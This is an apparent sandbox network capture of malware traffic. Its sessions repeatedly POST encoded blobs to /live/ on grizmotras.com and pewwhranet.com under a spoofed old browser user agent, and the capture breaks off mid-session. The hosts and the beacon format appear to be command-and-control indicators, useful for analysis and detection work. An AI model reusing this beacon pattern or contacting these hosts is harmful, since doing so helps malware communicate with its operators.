                                                                                                2024-04-26 21:23:37 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:23:37 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 44 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RoDMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:23:41 UTC582INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:23:41 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0%2FK%2BFTOb4GVYVf0DK0s4qlbty92eSC3%2FIqZeBmm3es2jI%2BiFUr53JMDWlebdvUNkbH4IDwaVjYCcy5zp7u2emE8dwT0lC3jqTvOCrwhBbDZj9GQKQBbihuV8pV2%2BOAVs%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a9a291ee847477-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:23:41 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:23:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                108192.168.2.549831104.21.59.82443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:23:42 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:23:42 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RvBcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                109192.168.2.549832104.21.84.207443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:23:46 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:23:46 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RvBcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                110192.168.2.549833104.21.59.82443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:23:50 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:23:50 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RvBcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                111192.168.2.549834104.21.84.207443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:23:55 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:23:55 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RvBcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                112192.168.2.549835104.21.59.82443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:23:59 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:23:59 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RvBcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:24:02 UTC578INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:24:02 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bvxZzYEOi2uY7MR17C8Gw896E2cMikQI%2FpL60RZggvi%2FZRcULsRiaD7M6p6Tctk%2B4ii%2F7RQfJ9ZlFqKKOwCxKMKVDOERgcq84YI3hrQ9C7ih0orAkERAANZqmyQyOyPuCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a9a3192a6ab3f1-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:24:02 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:24:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                113192.168.2.549836104.21.59.82443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:24:03 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:24:03 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RvBMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                114192.168.2.549837104.21.84.207443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:24:07 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:24:07 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RvBMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                115192.168.2.549838104.21.59.82443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:24:11 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:24:11 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RvBMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                116192.168.2.549839104.21.84.207443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:24:16 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:24:16 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4c 79 2b 64 30 39 4d 79 53 49 68 74 78 75 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RvBMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsLy+d09MySIhtxuVHHuW


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                117192.168.2.549840104.21.59.82443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:24:20 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:24:20 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RvBMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:24:24 UTC582INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:24:24 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mv4ptAuYdhJ%2B%2BIScx99UaW7tDuXGDTtrwBbI1Xmofl%2FYRhlmCYTMOLz9fYaTfDsPQ3AeBaFjpL5LL%2FJ%2FzoqJvfhoMnnGEZV8fyzNZHxyUXwuJa1ZEDhwMW%2Fkh41yfCvT7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a9a39cdea8a518-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:24:24 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:24:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                118192.168.2.549841104.21.59.82443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:24:24 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:24:24 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RvB8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:24:28 UTC576INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:24:28 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0jut0Mo%2BjVe3VmtELC%2BQZk5AX9PwBvXTPIju12FsAPiRLdVts58toVxvM39D5YBJnyG1vnR2deAbYUqJxwqdlM2jnKr2%2FHcKfy40G3DiMsjmiX1JIB43OhXGL8ZxAc9jog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a9a3b7887367d5-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:24:28 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:24:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                119192.168.2.549842104.21.59.82443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:24:28 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:24:28 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
